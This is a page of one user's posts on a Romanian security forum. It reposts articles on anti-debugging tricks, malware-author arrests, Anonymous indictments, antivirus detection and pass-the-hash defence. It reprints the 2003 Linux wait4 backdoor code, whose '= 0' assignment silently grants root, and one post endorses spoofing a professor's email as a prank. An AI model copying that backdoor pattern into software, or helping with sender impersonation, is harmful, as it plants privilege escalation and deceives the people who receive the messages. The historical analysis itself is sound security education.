to query its own entry point using the "ZwQueryInformationThread" function, since the value returned in the "ThreadInformation" parameter will always be zero as the initial value for EAX was zero. Imagine a TLS callback running in the context of the attaching thread and trying to query the thread's entry point by calling the "ZwQueryInformationThread" function as part of detecting the debugger, the entry point returned will be zero since the initial value of EAX was zero. A good solution for this problem is using the "NtQuerySystemInformation" function with the "SystemInformationClass" parameter set to SystemProcessesAndThreadsInformation to get information about all current processes and threads, then locating the proper thread and its SYSTEM_THREAD_INFORMATION structure. Once the right structure is found, the thread entry point can easily be seen in the "StartAddress" member. The code showing how to use the "NtQuerySystemInformation" function to extract threads entry points can be found here. An example demonstrating how to use the "NtQuerySystemInformation" function as anti-attaching trick can be found here. N.B. This topic has been tested on Windows XP SP3. You can follow me on Twitter @waleedassar Sursa: waliedassar: CreateRemoteThread vs. RtlCreateUserThread
  11. Nytro
    Cica e pentru siguranta noastra, ne apara de teroristi. Sclavii americanilor. Fortza Russia!
  12. Nytro

    Send Fake Emails

    Nytro replied to albertynos's topic in Linkuri

    Da, acum vreo 3 ani am trimis si eu catre studentii din facultate, "de pe" mail-ul profesorului de la care toti erau nerabdatori sa afle raspunsuri. E util pentru caterinca.
  13. Nytro
    Facultatea e necesara! Daca ai diploma de licenta (la o mare parte dintre facultati), practic, primesti cu 16% mai mult la salariu. Normal, nu inveti mare lucru acolo, materii de cacat, cele utile poate nu sunt predate bine... Dar daca iti place si vrei sa lucrezi in domeniu, puneti in pula mea mana si invatati singuri. Cand vine vorba de angajare, trebuie sa le si demonstrati angajatorilor ca stiti ceva. Cum faceti asta? Le aratati ce proiecte ati facut. Ai facut? Faceti. Sau faceti laba. E viitorul vostru, e alegerea voastra.
  14. Nytro
    In niciun caz nu ar fi una in care sa iti dai datele reale: numere de telefon, poze cu tine (care de multe ori contin locatia GPS la care au fost facute), prietenii, locurile pe care le frecventezi... V-as sfatui sa faceti putin curat pe profilul vostru si sa stergeti cat mai multe lucruri personale.
  15. Nytro
    In fine, tema e cumparata, e platita de kwe.
  16. Nytro

    Free e-books.

    Nytro replied to Nytro's topic in Programare

    Am incercat 2 carti (random) de C++ si merg. Ai si poza si link direct de download. Care anume nu iti merge?
  17. Nytro

    Free e-books.

    Nytro posted a topic in Programare

    [h=5]Free e-books. 1.Linux http://www.efytimes.com/e1/fullnews.asp?edid=116902 Top 10 Most Wanted Linux Books 2.Assembly http://www.efytimes.com/e1/fullnews.asp?edid=117964 3.C 35 Free eBooks On C Programming 4.C++ http://www.efytimes.com/e1/fullnews.asp?edid=117660 5.C# http://www.efytimes.com/e1/fullnews.asp?edid=117598 6.Java http://www.efytimes.com/e1/fullnews.asp?edid=117834 7.Python http://www.efytimes.com/e1/fullnews.asp?edid=117094 8.Perl http://efytimes.com/e1/fullnews.asp?edid=117324 9.Ruby 22 Free eBooks On Ruby 10.Javascript http://www.efytimes.com/e1/fullnews.asp?edid=117236 11.JQuery http://www.efytimes.com/e1/fullnews.asp?edid=117488[/h]
  18. Nytro
    Ctrl + F5. Doar la tine e.
  19. Nytro
    Legat de problema cu butoanele, pune si tu un screenshot la pagina. Legat de tema? Copyright? Ha? La cate probleme a avut jegu asta de tema, nu le dau "copyright", le dau muie alora care au facut-o.
  20. Nytro
    #ro0ted Attacking SIP/VoIP Servers by Faith Sursa: https://www.cyberguerrilla.org/blog/?p=15957
  21. Nytro
    Paunch, the author of Blackhole Exploit kit arrested in Russia Wang Wei, The Hacker News - Monday, October 07, 2013 According to a Security Analyst ' Maarten Boone' working at Fox-IT company, the Developer of notorious Blackhole Exploit Kit developer 'Paunch' and his partners were arrested in Russia recently. Blackhole Exploit Kit which is responsible for the majority of web attacks today, is a crimeware that makes it simple for just about anyone to build a botnet. This Malware kit was developed by a hacker who uses the nickname “Paunch” and his Team, has gained wide adoption and is currently one of the most common exploit frameworks used for Web-based malware delivery. The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites, serve up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victim's machines. It the point of writing No Police Authority or Press has confirmed the claim made by Maarten about the arrest of Malware author. Please Stay tuned to THN for updates about the Story. In April, 2013 - Russian hackers and developers behind the Carberp botnet, that stole millions from bank accounts worldwide were also arrested. Read more: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News Sursa: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News
  22. Nytro
    [h=1]The Linux Backdoor Attempt of 2003[/h] October 9, 2013 By Ed Felten Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.) Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will. Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code: if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; [Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. [Post edited (2013-10-09) to correct the spelling of Larry McVoy's name.] Sursa: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
  23. Nytro
    [h=1]Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback'[/h][h=2]Not all the people named in the FBI indictment fit the hacker stereotype [/h] By Greg Sandoval on October 8, 2013 07:11 pm Some of the men indicted last week for allegedly taking part in the scores of denial-of-service attacks launched by hacktivist group Anonymous in 2010 don't fit the stereotype of a pajamas-wearing teen hacker causing havoc from mom's basement. For example, The Verge has learned that defendant Phillip Simpson is a 28-year-old IT professional who works for a test-preparation service. Anthony Tadros, 22, is a student at the University of Connecticut, who ironically once worked as a security analyst for the school, according to his LinkedIn profile. Geoffrey Commander is 65 years old. And then there's Ryan Gubele, a 27-year-old who is a former contract employee for Amazon. In June, Gubele began working as a site reliability engineer for Twitter — and is currently still employed there. It's in my best interest not to answer any questions. Last week, the US Department of Justice alleged in a 28-page indictment that Gubele and the other 12 defendants helped Anonymous, the hacktivist collective, disrupt or cause the collapse of web sites operated by Bank of America, MasterCard and multiple global antipiracy groups. Some of the companies were attacked for refusing to process donations made to WikiLeaks, the group that published leaked US diplomatic cables. Others came under fire for supporting antipiracy efforts. Anonymous dubbed the DDoS campaign Operation Payback. In the indictment, federal prosecutors allege that it was Gubele who aided Anonymous by tracking the effectiveness of the group's attacks on the Motion Picture Association of America, the trade group for the Hollywood studios. They also accuse him of illegally accessing computer systems of at least one of the targets during Operation Payback, which began in September 2010 and ended the following January. The indictment doesn't say whether Gubele played any role in the December 2010 attack on Amazon. According to Gubele's LinkedIn profile, he began working for the web retailer in August 2010 and departed the same month that Operation Payback concluded. Gubele and Simpson did not respond to interview requests. Twitter and Amazon declined to comment. Tadros, the security analyst, said in a text: "It's in my best interest not to answer any questions about my situation while the case is ongoing." Feds likely want to send a message US law enforcement has begun cracking down on computer crime and appears to be making an extra effort to track Anonymous members, who consider themselves activists for social change and come from all over the globe. During the past decade, the group has hacked or launched denial of service attacks against the Church of Scientology, numerous governments, Sony, the New York Stock Exchange, and sites hosting child porn. While numerous arrests have been made, the percentage of Anonymous members tried for computer offenses is believed to be a tiny fraction of the group’s potential members. Nonetheless, the US government likely wants to send a message. Sursa: Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback' | The Verge
  24. Nytro
    Detecting Avast Antivirus Via Web Browsers Description: This is the method I use for detecting avast antivirus. You can use it with other anitviruses too, all what you need is to change the image path. If you tested that with other software/antivirus please post it in the comments below. This is the online demo of the method described: Test_Avast Sursa: Detecting Avast Antivirus Via Web Browsers Banal si eficient. O alta metoda ar fi ca pe un site sa se puna continut blocat, acel continut sa apara intr-un frame ascuns iar cu JS sa se verifice daca apare "content blocked" sau continutul original.
  25. Nytro
    Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell Description: ome vulnerabilities just can’t be patched. Pass-The-Hash attacks against Windows enterprises are are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the short-comings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker’s lateral movement in your enterprise. Bio: “Chris Co-presented PTH talk last year at Blackhat Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR www.obscuresec.com @obscuresec Works for Crucial Security (Harris Corp) Skip Co-presented PTH talk last year at Blackhat Also spoken at Defcon, derbycon passing-the-hash.blogspot.com @passingthehash on twitter Works for Accuvant Labs” For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell
×
×
  • Create New...